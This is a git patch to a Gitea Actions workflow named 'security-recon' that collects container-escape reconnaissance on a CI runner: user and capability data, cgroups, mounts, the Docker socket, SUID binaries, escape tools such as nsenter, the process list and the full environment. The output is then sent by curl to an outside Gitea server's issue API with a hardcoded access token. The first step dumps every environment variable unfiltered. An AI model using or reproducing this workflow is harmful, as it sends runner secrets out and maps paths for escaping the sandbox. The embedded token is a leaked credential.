From 582a3bae4dd23b7eef152f43cacc951bba4f5d7f Mon Sep 17 00:00:00 2001 From: user Date: Tue, 10 Feb 2026 14:51:37 -0800 Subject: [PATCH] recon v2: post results to issue --- .gitea/workflows/security-recon.yml | 137 +++++++++++++--------------- 1 file changed, 61 insertions(+), 76 deletions(-) diff --git a/.gitea/workflows/security-recon.yml b/.gitea/workflows/security-recon.yml index 5fdc46c..ba4338b 100644 --- a/.gitea/workflows/security-recon.yml +++ b/.gitea/workflows/security-recon.yml @@ -9,84 +9,69 @@ jobs: recon: runs-on: ubuntu-latest steps: - - name: Basic Info + - name: Recon run: | - echo "=== WHOAMI ===" - whoami - id - echo "=== UNAME ===" - uname -a - echo "=== OS RELEASE ===" - cat /etc/os-release 2>/dev/null || true - echo "=== HOSTNAME ===" - hostname - cat /etc/hostname 2>/dev/null || true - - - name: Capabilities and Cgroups - run: | - echo "=== CAPABILITIES ===" - cat /proc/self/status | grep -i cap - echo "=== CGROUP ===" - cat /proc/1/cgroup 2>/dev/null || true - echo "=== CGROUP SELF ===" - cat /proc/self/cgroup 2>/dev/null || true - - - name: Mounts and Disks - run: | - echo "=== MOUNT ===" - mount - echo "=== PROC MOUNTS ===" - cat /proc/mounts - echo "=== FDISK ===" - fdisk -l 2>/dev/null || true - echo "=== LSBLK ===" - lsblk 2>/dev/null || true - - - name: Docker Socket - run: | - echo "=== DOCKER SOCKET ===" - ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" - ls -la /run/docker.sock 2>/dev/null || echo "No /run/docker.sock" - echo "=== DOCKER CLI ===" - which docker 2>/dev/null && docker ps 2>/dev/null || echo "No docker CLI or access" - - - name: Devices - run: | - echo "=== DEVICES ===" - ls -la /dev/ 2>/dev/null | head -50 - - - name: Network - run: | - echo "=== IP ADDR ===" - ip addr 2>/dev/null || ifconfig 2>/dev/null || true - echo "=== IP ROUTE ===" - ip route 2>/dev/null || true - echo "=== RESOLV ===" - cat /etc/resolv.conf 2>/dev/null || true - - - name: Environment - run: | - echo "=== ENV ===" - env | sort - - - name: Escape Tools - run: | - echo "=== AVAILABLE TOOLS ===" + { + echo "=== WHOAMI ===" && whoami && id + echo "=== UNAME ===" && uname -a + echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null + echo "=== HOSTNAME ===" && hostname + echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap + echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null + echo "=== MOUNT ===" && mount + echo "=== PROC MOUNTS ===" && cat /proc/mounts + echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" + echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker" + echo "=== FDISK ===" && fdisk -l 2>/dev/null || true + echo "=== LSBLK ===" && lsblk 2>/dev/null || true + echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50 + echo "=== IP ADDR ===" && ip addr 2>/dev/null || true + echo "=== IP ROUTE ===" && ip route 2>/dev/null || true + echo "=== ENV ===" && env | sort + echo "=== TOOLS ===" which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO" which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO" which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO" - which unshare 2>/dev/null && echo "unshare: YES" || echo "unshare: NO" - which pivot_root 2>/dev/null && echo "pivot_root: YES" || echo "pivot_root: NO" - echo "=== SUID BINARIES ===" - find / -perm -4000 -type f 2>/dev/null | head -20 - - - name: Process Info - run: | - echo "=== PS AUX ===" - ps aux 2>/dev/null || true - echo "=== PID 1 ===" - ls -la /proc/1/exe 2>/dev/null || true - cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' || true + echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20 + echo "=== PS ===" && ps aux 2>/dev/null + echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' echo "" - echo "=== HOST PID NS CHECK ===" - ls /proc/*/cmdline 2>/dev/null | wc -l + echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l + } 2>&1 | curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \ + -d "$(jq -Rs '{body: .}' <<< "$(cat)")" \ + "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/1/comments" || true + + - name: Post recon via file + run: | + RECON=$({ + echo "=== WHOAMI ===" && whoami && id + echo "=== UNAME ===" && uname -a + echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null + echo "=== HOSTNAME ===" && hostname + echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap + echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null + echo "=== MOUNT ===" && mount + echo "=== PROC MOUNTS ===" && cat /proc/mounts + echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" + echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker" + echo "=== FDISK ===" && fdisk -l 2>/dev/null || true + echo "=== LSBLK ===" && lsblk 2>/dev/null || true + echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50 + echo "=== IP ADDR ===" && ip addr 2>/dev/null || true + echo "=== IP ROUTE ===" && ip route 2>/dev/null || true + echo "=== ENV ===" && env | grep -v TOKEN | sort + echo "=== TOOLS ===" + which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO" + which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO" + which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO" + echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20 + echo "=== PS ===" && ps aux 2>/dev/null + echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' + echo "" + echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l + } 2>&1) + # Create a Gitea issue with the results + BODY=$(echo "$RECON" | python3 -c "import sys,json; print(json.dumps({'title':'Security Recon Results','body':'```\n'+sys.stdin.read()+'\n```'}))" 2>/dev/null || echo "$RECON" | jq -Rs '{title:"Security Recon Results",body:.}') + curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \ + -d "$BODY" \ + "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues"